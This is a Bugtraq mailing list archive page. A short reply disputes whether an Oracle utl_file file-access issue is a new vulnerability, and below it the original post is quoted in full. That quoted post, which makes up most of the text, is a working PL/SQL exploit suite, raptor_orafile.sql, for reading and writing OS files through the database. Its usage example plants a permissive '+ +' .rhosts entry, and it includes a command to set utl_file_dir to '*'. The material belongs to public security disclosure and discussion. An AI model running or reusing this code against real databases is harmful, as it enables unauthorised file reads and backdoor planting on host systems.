Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Oracle <= 9i / 10g File System Access via utl_file Exploit
From: sumit kumar soni <sumit_uit () yahoo com>
Date: Wed, 20 Dec 2006 04:33:32 -0800 (PST)

HI,
I don't  think so its any new vulnerability or exploit
(make me 
correct). As i remember there was a  vulnerability
related to Directory 
Traversal via this package
http://www.red-database-security.com/exploits/oracle-directory-traversal-via-utl_file.html
What i believe its a feature to acess OS files.  it
never come as a 
good practice to set  utl_file_dir=* .  On OS you cant
set  acess for an 
database acoount like  scott or others. 
Rgards
Sumit
--- none () none com wrote:

-- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00
raptor Exp $
--
-- raptor_orafile.sql - file system access suite for
oracle
-- Copyright (c) 2006 Marco Ivaldi
<raptor () 0xdeadbeef info>
--
-- This is an example file system access suite for
Oracle based on the utl_file
-- package
(http://www.adp-gmbh.ch/ora/plsql/utl_file.html).
Use it to remotely
-- read/write OS files with the privileges of the
RDBMS user, without the need
-- for any special privileges (CONNECT and RESOURCE
roles are more than enough).
--
-- The database _must_ be configured with a non-NULL
utl_file_dir value
-- (preferably '*'). Check it using the following
query:
-- SQL> select name, value from v$parameter where
name = 'utl_file_dir';
--
-- If you have the required privileges (ALTER
SYSTEM) and feel brave 
-- enough to perform a DBMS shutdown/startup, you
can consider modifying 
-- this parameter yourself, using the following
PL/SQL:
-- SQL> alter system set utl_file_dir='*' scope
=spfile;
--
-- See also:

http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
--
-- Usage example:
-- $ sqlplus scott/tiger
-- [...]
-- SQL> @raptor_orafile.sql
-- [...]
-- SQL> exec utlwritefile('/tmp', 'mytest', '# this
is a fake .rhosts file');
-- SQL> exec utlwritefile('/tmp', 'mytest', '+ +');
-- SQL> set serveroutput on;
-- SQL> exec utlreadfile('/tmp', 'mytest');
-- # this is a fake .rhosts file
-- + +
-- End of file.
--

-- file reading module
--
-- usage: set serveroutput on;
--        exec utlreadfile('/dir', 'file');
create or replace procedure utlreadfile(p_directory
in varchar2, p_filename in varchar2) as
buffer varchar2(260);
fd utl_file.file_type;
begin
      fd := utl_file.fopen(p_directory, p_filename, 'r');
      dbms_output.enable(1000000);
      loop
              utl_file.get_line(fd, buffer, 254);
              dbms_output.put_line(buffer);
      end loop;
      exception when no_data_found then
              dbms_output.put_line('End of file.');
              if (utl_file.is_open(fd) = true) then
                      utl_file.fclose(fd);
              end if;
      when others then
              if (utl_file.is_open(fd) = true) then
                      utl_file.fclose(fd);
              end if;
end;
/

-- file writing module
--
-- usage: exec utlwritefile('/dir', 'file', 'line to
append');
create or replace procedure utlwritefile(p_directory
in varchar2, p_filename in varchar2, p_line in
varchar2) as
fd utl_file.file_type;
begin
      fd := utl_file.fopen(p_directory, p_filename, 'a');
-- append
      utl_file.put_line(fd, p_line);
      if (utl_file.is_open(fd) = true) then
              utl_file.fclose(fd);
      end if;
end;
/



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]